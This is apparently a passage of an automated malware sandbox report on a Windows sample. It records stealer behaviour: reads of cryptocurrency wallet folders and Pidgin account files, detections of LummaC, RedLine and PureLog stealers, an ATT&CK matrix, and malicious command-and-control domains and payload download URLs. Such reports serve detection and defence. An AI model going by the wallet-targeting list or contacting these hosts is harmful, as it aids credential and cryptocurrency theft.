Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\tUMORNtejDVyzSMTraAbFIMeGfARtlAOsbGGsGxXak\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\00c07260dc\.purple\accounts.xml	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4976, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4976, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 10.0.alexxxxxxxx.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2217700639.00000000005F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b05570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Traffic.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Traffic.exe.125f1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b07541.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.0.jok.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.propro.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b8e946.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b07541.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Traffic.exe.125f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2242861766.0000000000342000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2271671273.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2371502958.00000000125F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: alexxxxxxxx.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: propro.exe PID: 1836, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jok[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001BE044 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	26_2_001BE044
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_00192500 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	26_2_00192500
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001BED3B Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	26_2_001BED3B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	11 Scheduled Task/Job	612 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	4 Obfuscated Files or Information	1 Credentials in Registry	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	Login Hook	11 Registry Run Keys / Startup Folder	1 Install Root Certificate	1 Credentials In Files	339 System Information Discovery	Distributed Component Object Model	11 Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	11 Scheduled Task/Job	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	11101 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	581 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	581 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	612 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bUWKfj04aU.exe	63%	ReversingLabs	Win32.Trojan.RisePro
bUWKfj04aU.exe	66%	Virustotal		Browse
bUWKfj04aU.exe	100%	Avira	TR/Crypt.TPM.Gen
bUWKfj04aU.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	100%	Avira	HEUR/AGEN.1310451
C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	100%	Avira	HEUR/AGEN.1310451
C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	100%	Avira	HEUR/AGEN.1310451
C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	100%	Avira	HEUR/AGEN.1310451
C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	100%	Avira	HEUR/AGEN.1310451
C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	100%	Joe Sandbox ML
C:\ProgramData\wikombernizc\reakuqnanrkn.exe	96%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\wikombernizc\reakuqnanrkn.exe	83%	Virustotal		Browse
C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	45%	Virustotal		Browse
C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	45%	Virustotal		Browse
C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	26%	ReversingLabs	Win64.Trojan.Znyonm
C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	34%	Virustotal		Browse
C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	26%	ReversingLabs	Win64.Trojan.Znyonm
C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	34%	Virustotal		Browse
C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	60%	Virustotal		Browse
C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	44%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
bordersoarmanusjuw.shop	true
mealplayerpreceodsju.shop	true
absentconvicsjawun.shop	true
pushjellysingeywus.shop	true
economicscreateojsu.shop	true
185.172.128.33:8970	true
wifeplasterbakewis.shop	true
suitcaseacanehalk.shop	true
entitlementappwo.shop	true

URLs from Memory and Binaries

Name	Source	Malicious
https://legal.opera.com/terms	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://ocsp.sectigo.com0	ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	false
https://www.opera.com/privacy	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://crashpad.chromium.org/bug/new	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://help.opera.com/latest/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://contoso.com/License	powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	false
https://junglethomas.com/45c777cd634b90d85bd90992c72a11ec/4767d2e713f2021e8fe856e3ea638b58.exe	NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
https://policies.google.com/terms;	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://api.ip.s	Traffic.exe, 0000000F.00000002.2321334601.0000000002648000.00000004.00000800.00020000.00000000.sdmp	false
https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://www.indyproject.org/	ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com	ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	false
https://gamemaker.io/en/education.	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://legal.opera.com/terms.	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://localhost:3001api/prefs/?product=$1&version=$2..	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://autoupdate.geo.opera.com/https://autoupdate.geo.opera.com/geolocation/OperaDesktophttps://cr	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://www.opera.com/download/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://telegram.org/tos/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://junglethomas.com/AV	NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://junglethomas.com/IV	NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.2542158333.000001A31C51F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	Traffic.exe, 0000000F.00000002.2321334601.000000000270D000.00000004.00000800.00020000.00000000.sdmp	false
https://junglethomas.com/a638b58.exe	NewB.exe, 00000017.00000003.2353346772.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false
https://sectigo.com/CPS0D	ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	false
https://affordcharmcropwo.shop:443/api	RegAsm.exe, 0000001D.00000002.2648072968.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false
https://www.opera.com	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.2329069895.000001A30C4B1000.00000004.00000800.00020000.00000000.sdmp	false
https://autoupdate.geo.opera.com/	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
https://twitter.com/en/tos;	l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	false
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.2542158333.000001A31C51F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DAD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30D9F3000.00000004.00000800.00020000.00000000.sdmp	false
https://api.ip.sb/ip	alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, propro.exe, 0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp, Traffic.exe, 0000000F.00000002.2321334601.0000000002648000.00000004.00000800.00020000.00000000.sdmp, jok.exe, 0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp	false
https://economicscreateojsu.shop:443/api)	RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	false
